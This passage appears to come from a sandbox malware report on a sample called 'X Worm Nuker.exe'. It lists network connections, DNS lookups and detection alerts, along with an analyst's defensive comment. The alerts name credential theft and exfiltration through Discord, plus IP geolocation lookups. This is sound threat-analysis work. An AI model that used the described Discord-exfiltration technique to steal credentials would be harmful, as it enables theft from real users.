3216 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 40.126.31.130:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
6544 | svchost.exe | 23.54.109.203:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
7248 | X Worm Nuker.exe | 162.159.137.232:443 | discord.com | CLOUDFLARENET | - | whitelisted

Only the two rows for PID 7248 are attributable to the sample; the rest is Windows background traffic (update and licensing checks, CRL/OCSP, WNS push, Live sign-in, NetBIOS broadcasts). The dropped payload talks to discord.com over TLS and to gateway.discord.gg, the WebSocket gateway that Discord bots log into with a bot token, which is consistent with the "Attempt to exfiltrate via Discord" rule below. "whitelisted" is a verdict on the domain's reputation, not on what the connection carries, so Discord traffic from a binary running out of %TEMP% still warrants blocking at the proxy.

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 23.48.23.141
  • 23.48.23.158
  • 23.48.23.159
  • 23.48.23.143
  • 23.48.23.177
  • 23.48.23.164
  • 23.48.23.166
  • 23.48.23.180
  • 23.48.23.150
whitelisted
gateway.discord.gg
  • 162.159.135.234
  • 162.159.133.234
  • 162.159.136.234
  • 162.159.134.234
  • 162.159.130.234
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 40.126.31.130
  • 40.126.31.128
  • 20.190.159.23
  • 40.126.31.131
  • 20.190.159.0
  • 40.126.31.2
  • 20.190.159.73
  • 20.190.159.131
whitelisted
ocsp.digicert.com
  • 23.54.109.203
whitelisted
discord.com
  • 162.159.137.232
  • 162.159.138.232
  • 162.159.136.232
  • 162.159.135.232
  • 162.159.128.233
whitelisted
geolocation-db.com
  • 159.89.102.253
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
www.bing.com
  • 2.19.96.66
  • 2.19.96.120
  • 2.19.96.8
  • 2.19.96.18
  • 2.19.96.80
  • 2.19.96.90
whitelisted

Threats

PID | Process | Class | Message
7248 | X Worm Nuker.exe | Misc activity | ET INFO Observed Discord Service Domain (gateway .discord .gg) in TLS SNI
2196 | svchost.exe | Misc activity | ET INFO Discord Chat Service Domain in DNS Lookup (gateway .discord .gg)
7248 | X Worm Nuker.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI)
2196 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2196 | svchost.exe | Misc activity | ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
7248 | X Worm Nuker.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord
7248 | X Worm Nuker.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
7248 | X Worm Nuker.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI)
2196 | svchost.exe | Misc activity | ET INFO External IP Lookup Domain in DNS Lookup (geolocation-db .com)
7248 | X Worm Nuker.exe | Misc activity | ET INFO External IP Lookup Domain (geolocation-db .com) in TLS SNI
No debug info